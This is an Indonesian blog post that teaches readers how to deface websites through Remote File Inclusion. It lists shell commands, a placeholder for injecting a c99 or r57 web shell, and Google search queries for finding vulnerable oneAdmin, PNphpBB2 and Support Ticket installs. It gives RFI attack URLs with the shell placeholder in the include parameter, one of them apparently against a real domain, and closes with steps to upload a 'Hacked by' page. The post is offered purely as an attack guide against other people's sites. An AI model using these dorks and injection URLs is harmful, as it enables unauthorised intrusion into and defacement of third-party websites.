Cara Mudah Deface Web

Kembali saya share tentang Deface Web..hehe Tapi untuk kali ini berbeda!! kali via RFI atau Remote File Inclusion. Okeeyy.. sebelum kita mulai, sebaiknya kita mengenali berbagai macam command command yang bermanfaat bagi kita.. * cd namadirectory = Melihat Suatu directory * ls -al = Melihat Suatu Directory Lebih Dalam lagi * find = Mengecek Directory directory * cat = Membaca Suatu Berkas * wget = MengUpload suatu Files * tar -zxvf = MengExtraxt suatu files yang berbentuk tgz * pwd = Mengetahui Di Directory mana Kita Berada * uname -a = Keberadaan Path berada * w = Mengetahui Siapa Saja yang telah menggunakan Shell. * curl = mendownload url * [EvilShellInject] = inject rshell / c99 kamu okeeyy.., sekarang kita mulai dengan PHP,karena PHP banya Banget Bug-nya : Googling dulu ajah., oiya sebelumnya kalian Cari Dulu RFI di http://www.milw0rm.com/ -Site oneAdmin RFI kalian search di google dan masukkan keyword "oneadmin site:.com" atau "oneadmin site.com" (tanpa tanda petik) . nahh, sekarang saya kasih contoh Path nya >> http://target.com/oneadmin/config.php?path%5Bdocroot%5D Contoh : http://target.com/oneadmin/config.php?path%5Bdocroot%5D=%5BEvilShellInject%5D -PnphpBB2 kalian Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka.. nah sekarang saya kasi contoh path nya.. http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=%5BEvilShellInject%5D Contoh : http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=%5BEvilShellInject%5D - Support Ticket Kalian Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka.. nah sekarang saya kasi contoh path nya.. http://target.com/include/main.php?config%5Bsearch_disp%5D=true&include_dir Contoh : http://target.com/include/main.php?config%5Bsearch_disp%5D=true&include_dir=%5BEvilShellInject%5D Hehehe Lumayan banyak kan ? Nah selamat mencobanya.. Nah setelah itu buatlah sebuad file: index.html Isi dengan: Hacked by Nama Kamu Kemudian upload deh file ke directorynya kemudian buka website yang telah di deface: http://target.com/lokasipathnya/index.html Siap deh..

SHARE THIS

Author:

Previous Post
Next Post